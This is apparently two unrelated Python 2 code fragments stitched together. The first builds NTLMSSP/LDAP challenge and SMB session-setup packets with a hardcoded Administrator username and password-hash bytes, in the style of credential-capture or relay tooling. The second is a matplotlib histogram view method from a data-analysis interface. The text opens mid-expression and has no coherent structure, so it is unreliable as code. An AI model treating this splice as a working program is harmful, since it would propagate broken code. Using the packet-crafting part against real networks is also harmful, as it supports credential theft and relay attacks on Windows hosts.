self.fields["NTLMSSPNtTargetInfoMaxLen"] ) + str( self.fields["NTLMSSPNtTargetInfoBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) ###### AvPairs Offset CalculateLenAvpairs = str( self.fields["NTLMSSPNTLMChallengeAVPairsId"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]) + ( self.fields["NTLMSSPNTLMChallengeAVPairs2Id"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]) + ( self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) ###### LDAP Packet Len CalculatePacketLen = str(self.fields["MessageIDASNID"]) + str( self.fields["MessageIDASNLen"] ) + str(self.fields["MessageIDASNStr"]) + str( self.fields["OpHeadASNID"] ) + str(self.fields["OpHeadASNIDLenOfLen"]) + str( self.fields["OpHeadASNIDLen"]) + str(self.fields["Status"]) + str( self.fields["StatusASNLen"]) + str( self.fields["StatusASNStr"]) + str( self.fields["MatchedDN"]) + str( self.fields["ErrorMessage"]) + str( self.fields["SequenceHeader"]) + str( self.fields["SequenceHeaderLen"]) + str( self.fields["SequenceHeaderLenOfLen"] ) + CalculateOffsetWorkstation + str( self.fields["NTLMSSPNtWorkstationName"] ) + CalculateLenAvpairs OperationPacketLen = str(self.fields["Status"]) + str( self.fields["StatusASNLen"] ) + str(self.fields["StatusASNStr"]) + str( self.fields["MatchedDN"]) + str(self.fields["ErrorMessage"]) + str( self.fields["SequenceHeader"] ) + str(self.fields["SequenceHeaderLen"]) + str( self.fields["SequenceHeaderLenOfLen"] ) + CalculateOffsetWorkstation + str( self.fields["NTLMSSPNtWorkstationName"]) + CalculateLenAvpairs NTLMMessageLen = CalculateOffsetWorkstation + str( self.fields["NTLMSSPNtWorkstationName"]) + CalculateLenAvpairs ##### LDAP Len Calculation: self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen)) self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen)) self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen)) ##### Workstation Offset Calculation: self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack( "<i", len(CalculateOffsetWorkstation)) self.fields["NTLMSSPNtWorkstationLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) ##### IvPairs Offset Calculation: self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack( "<i", len(CalculateOffsetWorkstation + str(self.fields["NTLMSSPNtWorkstationName"]))) self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack( "<h", len(CalculateLenAvpairs)) self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack( "<h", len(CalculateLenAvpairs)) ##### IvPair Calculation: self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMBSessionTreeData(Packet): fields = OrderedDict([ ("Wordcount", "\x0d"), ("AndXCommand", "\x75"), ("Reserved", "\x00"), ("Andxoffset", "\x7c\x00"), ("Maxbuff", "\x04\x11"), ("Maxmpx", "\x32\x00"), ("Vcnum", "\x00\x00"), ("Sessionkey", "\x00\x00\x00\x00"), ("AnsiPassLength", "\x18\x00"), ("UnicodePassLength", "\x00\x00"), ("Reserved2", "\x00\x00\x00\x00"), ("Capabilities", "\xd4\x00\x00\x00"), ("Bcc", "\x3f\x00"), ("AnsiPasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89" ), ("UnicodePasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89" ), ("Username", "Administrator"), ("UsernameTerminator", "\x00\x00"), ("Domain", "SMB"), ("DomainTerminator", "\x00\x00"), ("Nativeos", ""), ("NativeosTerminator", "\x00\x00"), ("Lanmanager", ""), ("LanmanagerTerminator", "\x00\x00\x00"), ("Wordcount2", "\x04"), ("Andxcmd2", "\xff"), ("Reserved3", "\x00"), ("Andxoffset2", "\x06\x01"), ("Flags", "\x08\x00"), ("PasswordLength", "\x01\x00"), ("Bcc2", "\x19\x00"), ("Passwd", "\x00"), ("PrePath", "\\\\"), ("Targ", "CSCDSFCS"), ("IPC", "\\IPC$"), ("TerminatorPath", "\x00\x00"), ("Service", "?????"), ("TerminatorService", "\x00"), ]) def calculate(self): ##Convert first self.fields["Username"] = self.fields["Username"].encode('utf-16be') self.fields["Domain"] = self.fields["Domain"].encode('utf-16be') self.fields["Nativeos"] = self.fields["Nativeos"].encode('utf-16be') self.fields["Lanmanager"] = self.fields["Lanmanager"].encode( 'utf-16be') self.fields["PrePath"] = self.fields["PrePath"].encode('utf-16le') self.fields["Targ"] = self.fields["Targ"].encode('utf-16le') self.fields["IPC"] = self.fields["IPC"].encode('utf-16le') ##Then calculate data1 = str(self.fields["AnsiPasswd"]) + ( self.fields["UnicodePasswd"]) + str(self.fields["Username"]) + str( self.fields["UsernameTerminator"]) + str( self.fields["Domain"]) + str( self.fields["DomainTerminator"]) + str( self.fields["Nativeos"]) + str( self.fields["NativeosTerminator"]) + str( self.fields["Lanmanager"]) + str( self.fields["LanmanagerTerminator"]) data2 = str(self.fields["Passwd"]) + str(self.fields["PrePath"]) + str( self.fields["Targ"]) + str(self.fields["IPC"]) + str( self.fields["TerminatorPath"]) + str( self.fields["Service"]) + str( self.fields["TerminatorService"]) self.fields["Bcc"] = struct.pack("<h", len(data1)) self.fields["Bcc2"] = struct.pack("<h", len(data2)) self.fields["Andxoffset"] = struct.pack("<h", len(data1) + 32 + 29) self.fields["AnsiPassLength"] = struct.pack( "<h", len(str(self.fields["AnsiPasswd"]))) self.fields["UnicodePassLength"] = struct.pack( "<h", len(str(self.fields["UnicodePasswd"]))) self.fields["PasswordLength"] = struct.pack( "<h", len(str(self.fields["Passwd"])))
class Eth2(Packet): fields = OrderedDict([ ("DstMac", ""), ("SrcMac", ""), ("Type", "\x08\x00"), #IP ])
def view(self, tables): """ The view method of this module draws the control panel and the histograms. We need at least one input to be able to draw something. """ if not tables: return View(self, 'No tables to show.') self.widgets.color.guess_or_remember(('histogram text', tables), ['name']) self.widgets.text.guess_or_remember(('histogram colors', tables), ['name']) self.widgets.shift.guess_or_remember(('histogram shift', tables), '0.2') self.widgets.sort_inside.guess_or_remember( ('histogram sort inside', tables), ['similarity']) self.widgets.sort_outside.guess_or_remember( ('histogram sort outside', tables), ['sort']) self.widgets.trim.guess_or_remember(('histogram trim', tables), ['no']) self.widgets.trim_thresh.guess_or_remember( ('histogram trim thresh', tables), '0') sort_inside_options = [('unsort', 'Keep original order'), ('similarity', 'Put similar curves together')] sort_inside_options += [(x, 'Sort by %s' % x) for x in tables[0].tags.keys()] # Create the control panel view. This will enable users to choose the dimensions. control_panel_view = stack_lines( self.widgets.dims.view('Dimension', self.widgets.apply, options_from_table(tables[0])), self.widgets.text.view('Text by', self.widgets.apply, tables[0].tags.keys()), self.widgets.color.view('Color by', self.widgets.apply, tables[0].tags.keys()), self.widgets.shift.view('Shift for multiple curves', self.widgets.apply), self.widgets.sort_inside.view('Curve sorting', self.widgets.apply, sort_inside_options, multiple=False), self.widgets.sort_outside.view( 'Plot sorting', self.widgets.apply, [('sort', 'Put plots with many differences first'), ('unsort', 'Keep original order')], multiple=False), self.widgets.trim.view( 'Trim plots', self.widgets.apply, [('yes', 'Convert values lower than threshold to 0'), ('no', 'Don\'t trim')], multiple=False), self.widgets.trim_thresh.view('Trim threshold', self.widgets.apply), self.widgets.apply.view()) main_views = [] shift = self.widgets.shift.value_as_float() plots_for_legend = OrderedDict() colorer = axes.Colorer() # Check that the user has already chosen dimensions. Otherwise, ask him # to do so. if self.widgets.dims.values.choices: timer = MultiTimer(len(self.widgets.dims.values.choices)) for i, dim in enumerate(self.widgets.dims.values.choices): try: # Go over every dimension and create the histogram: # First create a new figure: fig = self.create_and_adjust_figure(tables) ax = fig.add_subplot(111) # Draw the histogram for every input plots = [] sorted_tables = tables sort_method = self.widgets.sort_inside.values.choices[0] if sort_method == 'unsort': sorted_tables = tables elif sort_method == 'similarity': thresh = None if self.widgets.trim.get_choices()[0] == 'yes': thresh = self.widgets.trim_thresh.value_as_float() # get distances table: distances = datatable.ks_distances(tables, dim, thresh) # sort by distance sorted_tables = greedy_distance_sort(distances, tables) else: # we need to sort by tags: tag_for_sort = self.widgets.sort_inside.values.choices[ 0] sorted_tables = sorted( tables, key=lambda table: table.tags[tag_for_sort]) for i, table in enumerate(sorted_tables): color_tags = self.widgets.color.values.choices color_key = tuple([table.tags[c] for c in color_tags]) min_x = None if self.widgets.trim.get_choices()[0] == 'yes': min_x = self.widgets.trim_thresh.value_as_float() plot = axes.kde1d(ax, table, dim, color=colorer.get_color(color_key), min_x=min_x, shift=shift * i) plots_for_legend[color_key] = plot # Add ticks with table names: if self.widgets.shift.value_as_float() > 0: ax.set_yticks(np.arange(0, len(tables) * shift, shift)) ax.set_yticklabels([ t.get_tags(self.widgets.text.values.choices) for t in sorted_tables ], size='xx-small') # set axes y range: ax.set_ylim(bottom=-0.1, top=0.8 + shift * (len(sorted_tables) - 1)) # Make sure we don't create the same widget twice. We create a new widget # for every dimension asked. widget_key = self._normalize_id(dim) if not widget_key in self.widgets: self._add_widget(widget_key, Figure) figure_widget = self.widgets[widget_key] if len(tables) > 1: from scipy.stats import ks_2samp ks, p_ks = ks_2samp(tables[0].get_cols(dim)[0], tables[1].get_cols(dim)[0]) ks_view = View(self, 'ks: %.3f, p_ks: %.10f' % (ks, p_ks)) final_view = stack_lines(ks_view, figure_widget.view(fig)) else: ks, p_ks = 0, 0 final_view = figure_widget.view(fig) # Add the new widget's view main_views.append((ks, p_ks, final_view)) except Exception as e: logging.exception('Exception when drawing histogram') main_views.append((0, 0, View(self, str(e)))) timer.complete_task(dim) # sort by the ks test: main_views = sorted(main_views, key=itemgetter(0), reverse=True) main_views = [v[2] for v in main_views] # create legend: legened_titles = plots_for_legend.keys() print len(legened_titles) max_title_len = max([len(str(t)) for t in legened_titles] + [0]) print max_title_len WIDTH_PER_LETTER = 7 EXTRA_WIDTH = 60 HEIGHT_PER_LINE = 30 EXTRA_HEIGHT = 50 MIN_X = 300 MIN_Y = 100 legend_x = max(MIN_X, EXTRA_WIDTH + WIDTH_PER_LETTER * max_title_len) legend_y = max( MIN_Y, EXTRA_HEIGHT + HEIGHT_PER_LINE * len(legened_titles)) fig = axes.new_figure(legend_x, legend_y) ax = fig.add_subplot(111) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) ax.legend(plots_for_legend.values(), plots_for_legend.keys(), loc='center', mode='expand', frameon=False, prop={'size': 'xx-small'}) main_views = [self.widgets.legend_figure.view(fig)] + main_views main_view = view.stack_left(*main_views) else: main_view = View(None, 'Please select dimensions') # combine the control panel and the main view togeteher: return self.widgets.layout.view(main_view, control_panel_view)